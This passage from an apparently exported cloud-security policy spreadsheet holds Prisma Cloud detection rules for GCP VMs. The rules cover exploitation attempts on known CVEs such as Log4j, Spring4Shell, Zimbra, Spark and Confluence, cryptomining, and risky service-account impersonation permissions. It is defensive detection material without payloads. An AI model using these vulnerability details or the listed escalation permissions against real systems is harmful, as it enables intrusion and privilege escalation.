          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-27318','CVE-2022-25882'))</t>
        </is>
      </c>
      <c r="AA2761" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2761" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:26</t>
        </is>
      </c>
      <c r="AC2761" t="inlineStr"/>
      <c r="AD2761" t="b">
        <v>1</v>
      </c>
      <c r="AE2761" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2761" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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1" t="inlineStr">
        <is>
          <t>e7f304df-73a7-42dd-bd9c-e7f2452d119c</t>
        </is>
      </c>
      <c r="AI2761" t="inlineStr">
        <is>
          <t>c21700b5-c8c5-4d9b-900f-d5fa32317ffc</t>
        </is>
      </c>
      <c r="AJ2761" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2761" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2762">
      <c r="A2762" t="inlineStr"/>
      <c r="B2762" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2762" s="2" t="inlineStr"/>
      <c r="D2762" t="inlineStr"/>
      <c r="E2762" t="inlineStr"/>
      <c r="F2762" t="inlineStr"/>
      <c r="G2762" t="b">
        <v>1</v>
      </c>
      <c r="H27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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2762" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2762" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability (CVE-2021-39144, XStream)</t>
        </is>
      </c>
      <c r="L2762" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2762" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2762" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2762" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2762" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2762" t="inlineStr"/>
      <c r="R2762" t="inlineStr"/>
      <c r="S2762" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2762" t="b">
        <v>0</v>
      </c>
      <c r="U2762" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2762" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2762" t="inlineStr">
        <is>
          <t>This policy identifies attempts to exploit a known vulnerability (CVE-2021-39144) in applications running on GCP VM resources. The presence of CVE-2021-39144 in the application indicates a critical security risk that could allow attackers to execute arbitrary code through unsafe deserialization, leading to potential system compromise.
Detecting attempts to exploit this vulnerability underscores the urgency of assessing and securing affected applications to prevent successful attacks. The exploitation of CVE-2021-39144 could lead to significant security incidents, including unauthorized execution of code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CVE-2021-39144 vulnerability on affected GCP VM instances. This includes applying security patches, reviewing access controls, and conducting thorough audits to prevent unauthorized code execution. Taking swift measures to address this vulnerability will help protect against unauthorized access and maintain the trust and confidence of stakeholders.</t>
        </is>
      </c>
      <c r="X2762" t="inlineStr">
        <is>
          <t>[Vulnerability]
1. Identify and access the reported resource affected by CVE-2021-39144
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
https://nvd.nist.gov/vuln/detail/CVE-2021-39144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762" t="inlineStr"/>
      <c r="Z2762" t="inlineStr">
        <is>
          <t>asset WHERE asset.type = 'gcloud-compute-instances-list' and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-39144 - Unsafe Deserialization in XStream) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-39144'))</t>
        </is>
      </c>
      <c r="AA2762" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2762" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:27</t>
        </is>
      </c>
      <c r="AC2762" t="inlineStr"/>
      <c r="AD2762" t="b">
        <v>1</v>
      </c>
      <c r="AE2762" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2762" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>aef15df7-c32d-489b-ac3d-a604e4652520</t>
        </is>
      </c>
      <c r="AI2762" t="inlineStr">
        <is>
          <t>a098791e-3b18-4c4d-8e63-bdf6ef765f06</t>
        </is>
      </c>
      <c r="AJ2762" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2762" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2763">
      <c r="A2763" t="inlineStr"/>
      <c r="B2763" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2763" s="2" t="inlineStr"/>
      <c r="D2763" t="inlineStr"/>
      <c r="E2763" t="inlineStr"/>
      <c r="F2763" t="inlineStr"/>
      <c r="G2763" t="b">
        <v>1</v>
      </c>
      <c r="H27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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2763" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2763" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Spring Framework, CVE-2022-22963, CVE-2022-22965]</t>
        </is>
      </c>
      <c r="L2763" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2763" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2763" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2763" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2763" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2763" t="inlineStr"/>
      <c r="R2763" t="inlineStr"/>
      <c r="S2763" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2763" t="b">
        <v>0</v>
      </c>
      <c r="U2763" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2763" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2763" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [Spring Framework, CVE-2022-22963, CVE-2022-22965]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Spring Framework software installed makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the Spring Framework [CVE-2022-22963, CVE-2022-22965] vulnerabilities reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X276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763" t="inlineStr"/>
      <c r="Z2763" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-22963, CVE-2022-22965 - SpringShell) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-22963', 'CVE-2022-22965'))</t>
        </is>
      </c>
      <c r="AA2763" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2763" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:30</t>
        </is>
      </c>
      <c r="AC2763" t="inlineStr"/>
      <c r="AD2763" t="b">
        <v>1</v>
      </c>
      <c r="AE2763" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2763" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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3" t="inlineStr">
        <is>
          <t>30a3dfa9-41b0-4f40-b803-98b5bc684e6e</t>
        </is>
      </c>
      <c r="AI2763" t="inlineStr">
        <is>
          <t>9a637bf8-2654-4916-a87a-c6b2e8e5f73c</t>
        </is>
      </c>
      <c r="AJ2763" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2763" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2764">
      <c r="A2764" t="inlineStr"/>
      <c r="B2764" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2764" s="2" t="inlineStr"/>
      <c r="D2764" t="inlineStr"/>
      <c r="E2764" t="inlineStr"/>
      <c r="F2764" t="inlineStr"/>
      <c r="G2764" t="b">
        <v>1</v>
      </c>
      <c r="H27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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2764" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2764" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Log4j, CVE-2021-44228]</t>
        </is>
      </c>
      <c r="L2764" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2764" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2764" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2764" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2764" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2764" t="inlineStr"/>
      <c r="R2764" t="inlineStr"/>
      <c r="S2764" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2764" t="b">
        <v>0</v>
      </c>
      <c r="U2764" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2764" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2764" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [Log4j, CVE-2021-44228]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Log4j software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Log4j [CVE-2021-44228] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X276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t>
        </is>
      </c>
      <c r="Y2764" t="inlineStr"/>
      <c r="Z2764" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-44228 - Apache Log4j2 &lt; 2.15.0) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-44228'))</t>
        </is>
      </c>
      <c r="AA2764" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2764" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:29</t>
        </is>
      </c>
      <c r="AC2764" t="inlineStr"/>
      <c r="AD2764" t="b">
        <v>1</v>
      </c>
      <c r="AE2764" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2764" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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4" t="inlineStr">
        <is>
          <t>e05c33a4-bfab-4d74-b834-70221c38ec50</t>
        </is>
      </c>
      <c r="AI2764" t="inlineStr">
        <is>
          <t>39ba9a4e-7a82-45a0-939d-4233d3a30de1</t>
        </is>
      </c>
      <c r="AJ2764" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2764" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2765">
      <c r="A2765" t="inlineStr"/>
      <c r="B2765" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2765" s="2" t="inlineStr"/>
      <c r="D2765" t="inlineStr"/>
      <c r="E2765" t="inlineStr"/>
      <c r="F2765" t="inlineStr"/>
      <c r="G2765" t="b">
        <v>1</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2765" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2765" t="inlineStr">
        <is>
          <t>Potentially nefarious hacking tools activity detected on a publicly exposed and vulnerable GCP VM instance with risky service account impersonation permissions</t>
        </is>
      </c>
      <c r="L2765" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2765" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2765" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2765" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2765" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2765" t="inlineStr"/>
      <c r="R2765" t="inlineStr"/>
      <c r="S2765" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2765" t="b">
        <v>0</v>
      </c>
      <c r="U2765" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2765" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2765" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and are connected with remote systems known for hacking tool activities having impersonate service account permissions that could potentially lead to privilege escalation.
Publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Hacking tools are commonly leveraged by attackers to infect, maintain, administer victim machines, and/or perform denial of service attacks. An attacker with impersonate service account permissions can elevate the access of the VM instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.
This policy checks for the following risky permissions: 
'iam.serviceAccounts.getAccessToken', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.getOpenIdToken', 'iam.serviceAccounts.actAs'
Immediate attention is required to investigate hacking tool activities, review risky service account permissions, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X276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65" t="inlineStr"/>
      <c r="Z2765" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name = (('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)' and 'GCP VM instance with permissions to impersonate a service account') and ('Traffic to a suspicious IP address associated with Exploit Kit activity' or 'Traffic from a suspicious IP address associated with Exploit Kit activity' or 'Traffic to a suspicious IP address associated with Hacking Tool activity' or 'Traffic from a suspicious IP address associated with Hacking Tool activity' or 'Traffic to a suspicious IP address associated with Rootkit activity' or 'Traffic from a suspicious IP address associated with Rootkit activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2765" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2765" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2765" t="inlineStr"/>
      <c r="AD2765" t="b">
        <v>1</v>
      </c>
      <c r="AE2765" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2765" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
          <t>2d14c246-e368-44b3-b165-0df79c1ae216</t>
        </is>
      </c>
      <c r="AI2765" t="inlineStr">
        <is>
          <t>c8e54d1c-434d-4b23-a78e-df016f84f6e3</t>
        </is>
      </c>
      <c r="AJ2765" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2765" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2766">
      <c r="A2766" t="inlineStr"/>
      <c r="B2766" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2766" s="2" t="inlineStr"/>
      <c r="D2766" t="inlineStr"/>
      <c r="E2766" t="inlineStr"/>
      <c r="F2766" t="inlineStr"/>
      <c r="G2766" t="b">
        <v>1</v>
      </c>
      <c r="H27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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2766" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2766" t="inlineStr">
        <is>
          <t>Potential risk of Cerber Ransomware attack on ports 80/443 due to publicly exposed and vulnerable GCP VM Instance (Confluence, CVE-2023-22515, CVE-2023-22518)</t>
        </is>
      </c>
      <c r="L2766" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2766" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2766" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2766" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2766" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2766" t="inlineStr"/>
      <c r="R2766" t="inlineStr"/>
      <c r="S2766" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2766" t="b">
        <v>0</v>
      </c>
      <c r="U2766" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2766" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2766" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have a known Cerber Ransomware vulnerability on ports 80/443 associated with Atlassian Confluence (CVE-2023-22515 and CVE-2023-22518).
CVE-2023-22515 is a critical vulnerability with a CVSS base score of 10.0, exploited remotely with low complexity, and does not require any privileges or user interaction. This flaw in Confluence allows attackers to create an account with admin privileges and execute arbitrary code.
CVE-2023-22518 shares several similarities with CVE-2023-22515. It also has a critical CVSS base score of 10.0 and can be easily exploited remotely without requiring any privileges or user interaction.
Exploitation of these vulnerabilities poses significant threats to the system's confidentiality, integrity, and availability. They allow attackers to gain complete control and potentially shut down the affected resources. Exploiting these CVEs can enable attackers to deploy Cerber Ransomware and gain complete control over the system.
The GCP VM instances being publicly exposed makes it an easy target for attackers to exploit vulnerabilities. If successfully exploited, attackers could deploy Cerber Ransomware, leading to data encryption, exfiltration, and other malicious activities that undermine the confidentiality and integrity of the system.
Immediate attention is required to remediate the Confluence (CVE-2023-22515 and CVE-2023-22518) vulnerabilities and the public exposure reported for the affected GCP VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2766" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict the internet exposure of reported VM instances based on your business requirement by modifying VPC firewall rules to the trusted IP address.
To modify VPC firewall rules,
1. Login to the GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict Internet access
4. Update the VPC firewall rule that allows Internet access (0.0.0.0/0) to a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
[Vulnerability]
To patch or update the vulnerable software, see:
https://nvd.nist.gov/vuln/detail/CVE-2023-22515
https://nvd.nist.gov/vuln/detail/CVE-2023-22518</t>
        </is>
      </c>
      <c r="Y2766" t="inlineStr"/>
      <c r="Z2766" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('GCP VM instance with network path from the internet (0.0.0.0/0) on ports 80/443') AND with : (Vuln WHERE id IN ('CVE-2023-22515','CVE-2023-22518'))</t>
        </is>
      </c>
      <c r="AA2766" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2766" t="inlineStr">
        <is>
          <t>2024-06-10 07:02:53</t>
        </is>
      </c>
      <c r="AC2766" t="inlineStr"/>
      <c r="AD2766" t="b">
        <v>1</v>
      </c>
      <c r="AE2766" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2766" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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6" t="inlineStr">
        <is>
          <t>4623ed7e-a342-4235-9607-7a53478e55b0</t>
        </is>
      </c>
      <c r="AI2766" t="inlineStr">
        <is>
          <t>fb503590-d214-429d-8815-e9f2742356c5</t>
        </is>
      </c>
      <c r="AJ2766" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2766" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2767">
      <c r="A2767" t="inlineStr"/>
      <c r="B2767" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2767" s="2" t="inlineStr"/>
      <c r="D2767" t="inlineStr"/>
      <c r="E2767" t="inlineStr"/>
      <c r="F2767" t="inlineStr"/>
      <c r="G2767" t="b">
        <v>1</v>
      </c>
      <c r="H27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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2767" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2767" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Zimbra, CVE-2022-27925]</t>
        </is>
      </c>
      <c r="L2767" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2767" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2767" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2767" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2767" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2767" t="inlineStr"/>
      <c r="R2767" t="inlineStr"/>
      <c r="S2767" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2767" t="b">
        <v>0</v>
      </c>
      <c r="U2767" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2767" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2767" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[Zimbra, CVE-2022-27925]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Zimbra software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Zimbra RCE [CVE-2022-27925] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X276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CVE-2022-27925
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-27925</t>
        </is>
      </c>
      <c r="Y2767" t="inlineStr"/>
      <c r="Z2767" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-27925 - Zimbra RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-27925'))</t>
        </is>
      </c>
      <c r="AA2767" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2767" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:34</t>
        </is>
      </c>
      <c r="AC2767" t="inlineStr"/>
      <c r="AD2767" t="b">
        <v>1</v>
      </c>
      <c r="AE2767" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2767" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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7" t="inlineStr">
        <is>
          <t>9a6966d0-a6b9-42ad-b53c-a13727b0231c</t>
        </is>
      </c>
      <c r="AI2767" t="inlineStr">
        <is>
          <t>fa90195a-7c08-4fa9-b3cd-95e70c698026</t>
        </is>
      </c>
      <c r="AJ2767" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2767" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2768">
      <c r="A2768" t="inlineStr"/>
      <c r="B2768" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2768" s="2" t="inlineStr"/>
      <c r="D2768" t="inlineStr"/>
      <c r="E2768" t="inlineStr"/>
      <c r="F2768" t="inlineStr"/>
      <c r="G2768" t="b">
        <v>1</v>
      </c>
      <c r="H27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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2768" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2768" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Apache Spark, CVE-2022-33891]</t>
        </is>
      </c>
      <c r="L2768" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2768" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2768" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2768" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2768" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2768" t="inlineStr"/>
      <c r="R2768" t="inlineStr"/>
      <c r="S2768" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2768" t="b">
        <v>0</v>
      </c>
      <c r="U2768" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2768" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2768" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[Apache Spark, CVE-2022-33891].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Apache Spark software installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the Apache Spark RCE [CVE-2022-33891] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X276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2768" t="inlineStr"/>
      <c r="Z2768" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-33891 - Apache Spark RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-33891'))</t>
        </is>
      </c>
      <c r="AA2768" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2768" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:35</t>
        </is>
      </c>
      <c r="AC2768" t="inlineStr"/>
      <c r="AD2768" t="b">
        <v>1</v>
      </c>
      <c r="AE2768" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2768" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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8" t="inlineStr">
        <is>
          <t>594b4d5b-9329-4cc5-a019-e83ba93ca94c</t>
        </is>
      </c>
      <c r="AI2768" t="inlineStr">
        <is>
          <t>1e4df341-1927-4fad-827b-f1a7724f9485</t>
        </is>
      </c>
      <c r="AJ2768" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2768" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2769">
      <c r="A2769" t="inlineStr"/>
      <c r="B2769" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2769" s="2" t="inlineStr"/>
      <c r="D2769" t="inlineStr"/>
      <c r="E2769" t="inlineStr"/>
      <c r="F2769" t="inlineStr"/>
      <c r="G2769" t="b">
        <v>1</v>
      </c>
      <c r="H27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69" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2769" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2769" t="inlineStr">
        <is>
          <t>Potentially unauthorized cryptomining activity detected on a publicly exposed and vulnerable GCP VM instance</t>
        </is>
      </c>
      <c r="L2769" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2769" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2769" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2769" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2769" t="inlineStr">
        <is>
